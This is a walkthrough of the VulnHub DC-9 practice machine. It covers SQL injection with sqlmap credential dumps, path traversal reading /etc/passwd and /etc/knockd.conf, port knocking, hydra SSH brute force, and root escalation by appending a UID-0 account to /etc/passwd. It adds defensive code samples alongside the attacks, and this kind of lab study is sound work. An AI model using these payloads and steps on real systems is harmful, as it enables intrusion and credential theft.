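Preface
This exercise targets the ninth and final machine in the DC series on VulnHub. It can be downloaded from https://www.vulnhub.com/entry/dc-9,412/. The goal is to gain root privileges and then read the only flag. The machine is of medium difficulty, and the key point is knowing about the knockd service, so it is worth reading up on knockd before attempting it.
Virtual machine configuration
The network connection mode is again NAT, to avoid scanning other physical hosts. After importing the virtual machine, right-click the DC-9 machine and select Settings. Then click Network configuration -> NAT mode -> Advanced -> Generate, and confirm.
Information gathering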
nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24
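-sn performs host discovery only, without port probing.
--min-parallelism adjusts the parallelism of probe packets: many probes are sent while scanning a host, and this value is the minimum number of probes nmap sends at a time.
--min-hostgroup adjusts the size of the parallel scan group, that is, how many hosts are scanned at the same time.
For more detail see: https://zhuanlan.zhihu.com/p/322244582 (notes on nmap performance parameters).
┌──(root💀kali)-[~]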
└─# nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:54 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 3 hosts. Timing: About 66.67% done; ETC: 20:54 (0:00:04 remaining)
Nmap scan report for 192.168.119.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:BD:97 (VMware)
Nmap scan report for 192.168.119.172
Host is up (0.00044s latency).
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Nmap scan report for 192.168.119.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E8:75:E7 (VMware)
Nmap scan report for 192.168.119.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 12.64 seconds
The target's IP address is 192.168.119.172, so next run a detailed nmap scan against it.
nmap -A -sV -p- --min-parallelism 100 192.168.119.172
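-A enables a comprehensive scan that gathers a lot of useful information.
-sV probes the main service information.
-p- the p option specifies ports, and the trailing - means all ports.
┌──(root💀kali)-[~]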
└─# nmap -A -sV -p- --min-parallelism 100 192.168.119.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:55 EDT
Nmap scan report for 192.168.119.172
Host is up (0.00068s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.119.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.07 seconds
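Port 80 is open and port 22 is filtered. The guess here is that the target uses the knockd service to close port 22, and that port 22 opens only after a specific port sequence has been visited. For more on protecting SSH see: https://www.cnblogs.com/rongfengliang/p/10904061.html (three locks for protecting SSH).
SQL injection vulnerability
Start with the web application to look for a foothold: open the site in a browser.
Clicking Manage in the navigation bar leads to a login page; a brute-force attempt against it did not succeed.
Clicking Search in the navigation bar shows an input box. As a quick check for SQL injection, enter 1' or 1=1#, which returns many results.
Then enter 1' or 1=2#, which returns no results, so SQL injection is present here.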
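Why the two probes behave differently, and why a bound parameter removes the difference, as an added example that is not from the original page or the DC-9 application. The table rows and function names are constructed, and SQLite's "--" comment stands in for MySQL's "#" so the block runs offline.

```python
import sqlite3

def make_db():
    """Build an in-memory table with constructed rows (not the real DC-9 schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE StaffDetails (id INTEGER, firstname TEXT, lastname TEXT)")
    db.executemany(
        "INSERT INTO StaffDetails VALUES (?, ?, ?)",
        [(1, "Mary", "Moe"), (2, "Julie", "Dooley"), (3, "Fred", "Flintstone")],
    )
    return db

def search_vulnerable(db, term):
    # Vulnerable pattern: the search term becomes part of the SQL text, so a
    # quote in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT firstname, lastname FROM StaffDetails WHERE firstname = '" + term + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # Hardened pattern: the SQL text is fixed and the term is bound as data.
    sql = "SELECT firstname, lastname FROM StaffDetails WHERE firstname = ?"
    return db.execute(sql, (term,)).fetchall()

# The page's two probes, with SQLite's "--" comment in place of MySQL's "#".
PROBE_TRUE = "1' or 1=1-- "
PROBE_FALSE = "1' or 1=2-- "

def compare(db):
    """Row counts for (true probe, false probe) under each query style."""
    return {
        "vulnerable": (len(search_vulnerable(db, PROBE_TRUE)),
                       len(search_vulnerable(db, PROBE_FALSE))),
        "parameterized": (len(search_parameterized(db, PROBE_TRUE)),
                          len(search_parameterized(db, PROBE_FALSE))),
    }

if __name__ == "__main__":
    print(compare(make_db()))
```

With concatenation the true and false conditions change the result set; with a bound parameter both probes are treated as a literal name and match nothing.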
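The injection point is submitted via POST, so first capture the data submitted on the search page with Burp Suite, then right-click, choose Copy to file, and save it as a file.
Then have sqlmap read that file and attack the target site.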
sqlmap -l target --dump --batch
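-l reads the attack target from a file saved by Burp Suite; the -r option can be used instead.
target is the name of the file just saved from Burp Suite.
--dump reads all content from the database.
--batch runs automatically, without offering choices to the user.
┌──(root💀kali)-[~/Documents/DC-9]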
└─# sqlmap -l target --dump --batch
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+

[21:35:48] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/Users.csv'
[21:35:48] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[21:35:48] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[21:35:48] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/StaffDetails.csv'
[21:35:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_0935pm.csv'
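Note that only the contents of the Staff database are shown here. The site also has a database named users, which stores some accounts and passwords that can be used later to brute-force SSH.
We now have the MD5 hash of admin's password, 856f5de590ef37314e7c3bdf6f8a66dc; try cracking it at https://www.somd5.com/.
With admin's password, transorbital1, log in to the site's admin area to go further.
File inclusion vulnerability
After logging in to the admin area, the bottom of the page shows the text File does not exist, which suggests that this page includes a file chosen through a request parameter.
Common names such as file, include and require are worth trying for the parameter that controls the inclusion, with /etc/passwd as the content to include, but the inclusion did not succeed. In the end Burp Suite with a wordlist was used to brute-force it.
For the file path wordlist, Kali's bundled /usr/share/wordlists/wfuzz/vulns/dirTraversal-nix.txt can be used. When the wordlist has run, click Length to sort; the request with the longest response should be the one where the inclusion succeeded.
Then visit that address in a browser and confirm that the file is included.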
http://192.168.119.172/manage.php?file=../../../..//etc/passwd
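Two ways a page like manage.php could handle the file parameter so that the traversal value above is rejected, as an added example that is not the application's code (its source is not shown on the page). The include root, the page names and the function names are hypothetical.

```python
import os

# Hypothetical names: the page does not show manage.php's source or directory layout.
INCLUDE_ROOT = "/var/www/html/includes"
ALLOWED_PAGES = {"welcome": "welcome.php", "contact": "contact.php"}

def resolve_by_allowlist(name):
    """Strongest option: the parameter is a lookup key, never a path."""
    filename = ALLOWED_PAGES.get(name)
    if filename is None:
        return None
    return os.path.join(INCLUDE_ROOT, filename)

def resolve_contained(user_path, root=INCLUDE_ROOT):
    """Fallback when arbitrary file names are needed: canonicalise the path,
    then require the result to stay under the include root."""
    root_real = os.path.realpath(root)
    # realpath collapses "..", duplicate slashes and symlinks before the check;
    # an absolute user_path replaces the root in os.path.join and is caught too.
    target = os.path.realpath(os.path.join(root_real, user_path))
    if os.path.commonpath([root_real, target]) != root_real:
        return None
    return target

if __name__ == "__main__":
    for value in ["welcome.php", "../../../..//etc/passwd", "/etc/knockd.conf"]:
        print(repr(value), "->", resolve_contained(value))
```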
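The knockd service
The guess is that the target uses the knockd service, so first a short introduction: when you do not want a port exposed, knockd can keep it closed so that others cannot reach it directly. To reach the port yourself, you must first visit a set of specified ports in order, and these steps must be completed within a set time. Once you have visited the specified ports in order within that time, the closed port is opened to you for a period of time. For more detail see: https://www.cnblogs.com/rongfengliang/p/10904061.html (three locks for protecting SSH).
If knockd is running, there is a configuration file /etc/knockd.conf, which stores the port sequence that has to be visited. It can be read through the file inclusion vulnerability.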
http://192.168.119.172/manage.php?file=../../../..//etc/knockd.conf
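According to the configuration file, ports 7469, 8475 and 9842 must be visited in order before the SSH service can be reached. Now install the knockd program locally; with it the target's specified ports can be visited in order.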
apt install knockd
knock 192.168.119.172 7469 8475 9842
Port 22 on the target is now reachable, so next try brute-forcing the target's SSH password.
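How an ordered, time-limited knock sequence gates a port, as a simplified model added here (not knockd's code and not from the original page). The timeout value, the second and third source addresses and the log entries are assumptions; the port order is the one the page reads from /etc/knockd.conf.

```python
SEQUENCE = [7469, 8475, 9842]   # order given in the page's /etc/knockd.conf
SEQ_TIMEOUT = 15                # seconds; assumed, the page does not show this value

# Constructed SYN log: (seconds, source IP, destination port)
SAMPLE_SYNS = [
    (0.0, "192.168.119.130", 7469),
    (0.4, "192.168.119.130", 8475),
    (0.9, "192.168.119.130", 9842),   # in order and in time
    (5.0, "192.168.119.50", 7469),
    (5.2, "192.168.119.50", 9842),    # out of order
    (5.4, "192.168.119.50", 8475),
    (10.0, "192.168.119.60", 7469),
    (11.0, "192.168.119.60", 8475),
    (40.0, "192.168.119.60", 9842),   # right port, but after the timeout
]

def hosts_opened(syns, sequence=SEQUENCE, timeout=SEQ_TIMEOUT):
    """Return source IPs that completed the sequence in order within the timeout."""
    progress = {}   # source IP -> (index of next expected port, time of first knock)
    opened = []
    for ts, src, port in syns:
        idx, start = progress.get(src, (0, ts))
        if idx > 0 and ts - start > timeout:
            idx, start = 0, ts              # attempt expired
        if port != sequence[idx]:
            idx, start = 0, ts              # wrong port: discard the attempt
            if port != sequence[0]:
                progress.pop(src, None)
                continue
        if idx == 0:
            start = ts                      # first knock starts the clock
        idx += 1
        if idx == len(sequence):
            opened.append(src)              # here the daemon would run its open command
            progress.pop(src, None)
        else:
            progress[src] = (idx, start)
    return opened

if __name__ == "__main__":
    print(hosts_opened(SAMPLE_SYNS))
```

The sequence is a static value stored in a configuration file, so any read access to /etc/knockd.conf, such as the file inclusion above, is enough to satisfy the check; knocking hides the port but SSH still needs strong authentication behind it.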
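Brute-forcing the SSH password
Wordlists have to be prepared before brute-forcing. The users database holds some accounts and passwords; query them with sqlmap and turn them into wordlists.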
sqlmap -l target -D users --dump --batch
-D specifies the database to query.
┌──(root💀kali)-[~/Documents/DC-9]
└─# sqlmap -l target -D users --dump --batch
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+

[22:27:26] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/users/UserDetails.csv'
[22:27:26] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_1027pm.csv'
Save all the accounts in user.txt and all the passwords in pass.txt, then use hydra to brute-force SSH.
hydra -L user.txt -P pass.txt ssh://192.168.119.172
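-L specifies an account wordlist file; to specify a single account use lowercase -l.
-P specifies a password wordlist file; to specify a single password use lowercase -p.
┌──(root💀kali)-[~/Documents/DC-9]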
└─# hydra -L user.txt -P pass.txt ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:43:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.119.172 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.119.172 login: janitor password: Ilovepeepee
[STATUS] 363.00 tries/min, 363 tries in 00:01h, 1 to do in 00:01h, 14 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:44:26
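Passwords for three accounts were recovered: login: chandlerb password: UrAG0D!, login: joeyt password: Passw0rd, and login: janitor password: Ilovepeepee.
Privilege escalation
Testing showed that the first two accounts hold no special files and offer no way to escalate. After logging in as janitor, a password file, passwords-found-on-post-it-notes.txt, was found in ~/.secrets-for-putin.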
ssh janitor@192.168.119.172
cd .secrets-for-putin
cat passwords-found-on-post-it-notes.txt
┌──(root💀kali)-[~/Documents/DC-9]
└─# ssh janitor@192.168.119.172
janitor@192.168.119.172's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 5 12:48:56 2021 from 192.168.119.130
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 5 12:44 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 5 12:44 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
Look at the passwords in this file, save them in a file pass2.txt, and run hydra against SSH again.
hydra -L user.txt -P pass2.txt ssh://192.168.119.172
└─# hydra -L user.txt -P pass2.txt ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:56:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.119.172 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:56:48
A new account and password were found, login: fredf password: B4-Tru3-001; log in with this account and try to escalate privileges.
ssh fredf@192.168.119.172
sudo -l
┌──(root💀kali)-[~/Documents/DC-9]
└─# ssh fredf@192.168.119.172
fredf@192.168.119.172's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$
fredf can run test with superuser privileges, so try running test.
/opt/devstuff/dist/test/test
Running it prints the following:
fredf@dc-9:~$ /opt/devstuff/dist/test/test
Usage: python test.py read append
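From this output, its function appears to be appending content to a file. A file test.py was then found in /opt/devstuff; this Python file is the source of test, so read it to work out what test does and how to use it.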
fredf@dc-9:/opt/devstuff/dist$ cd /opt/devstuff/
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$
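The source shows that the program appends the contents of the file given as argument 1 to the file given as argument 2. So an account entry can be appended to /etc/passwd.
/etc/passwd holds the information for all accounts, and adding an entry for an account with root privileges to this file yields root privileges.
First, the format of /etc/passwd, using root as an example: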
root:x:0:0:root:/root:/bin/bash
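Field 1: the username.
Field 2: the password placeholder; x means a password is set, and a password hash can also be placed here directly.
Field 3: the user's UID; a UID of 0 means the user is the superuser.
Field 4: the user's GID, that is, the ID of the user's group.
Field 5: user information (deprecated).
Field 6: the user's home directory.
Field 7: the shell used after the user logs in.
Then generate the password hash with openssl.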
openssl passwd -1 -salt rpsate rpsate
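passwd generates the hash of a password.
-1 selects the MD5-based method.
-salt salts the password.
The first rpsate is the account, the second rpsate is the password.
For more detail see https://blog.csdn.net/jiajiren11/article/details/80376371 (how the password field in /etc/shadow is generated).
┌──(root💀kali)-[~/Documents/DC-9]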
└─# openssl passwd -1 -salt rpsate rpsate
$1$rpsate$2r3jb6WfuHP8DFRd31cUF1
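So it is enough to append rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash to /etc/passwd. First write this string to a file, then use the test program to append it to /etc/passwd.
Testing showed that field 6, the home directory, must be present, otherwise the account is not recognized.
Field 2, the password, cannot be empty, otherwise authentication fails; field 2 above is the hash of the password rpsate.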
echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
fredf@dc-9:/opt/devstuff$ sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ tail /etc/passwd
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash
The rpsate account entry has now been written to /etc/passwd, so it is possible to switch to rpsate, an account with root privileges.
su rpsate
cat /root/theflag.txt
fredf@dc-9:/opt/devstuff$ su rpsate
Password:
root@dc-9:/opt/devstuff# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/opt/devstuff# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.
Privilege escalation succeeded!
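A check that flags the kind of /etc/passwd entry appended above, as an added example that is not from the original page. The function name and finding texts are hypothetical; the sample lines are taken from the output shown earlier on the page.

```python
# Lines copied from the page's output; only the last one was appended through test.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash
"""

def audit_passwd(text):
    """Return (line number, account, finding) tuples for risky passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        # Field 3: any UID 0 account is a superuser, whatever its name.
        if uid == "0" and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        # Field 2: anything other than the x placeholder or a locked marker
        # means the credential lives in the world-readable passwd file.
        if password == "":
            findings.append((lineno, name, "empty password field"))
        elif password != "x" and not password.startswith(("*", "!")):
            findings.append((lineno, name, "password hash stored in passwd"))
    return findings

if __name__ == "__main__":
    # On a live host, pass open("/etc/passwd").read() instead of the sample.
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

This catches the result only; the root cause on this host is the sudoers rule that lets fredf run a file-appending program as root with NOPASSWD.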
References
[1] https://zhuanlan.zhihu.com/p/322244582, notes on nmap performance parameters
[2] https://zhuanlan.zhihu.com/p/112172905, vulnHub-DC9
[3] https://www.cnblogs.com/rongfengliang/p/10904061.html, three locks for protecting SSH
[4] https://blog.csdn.net/jiajiren11/article/details/80376371, how the password field in /etc/shadow is generated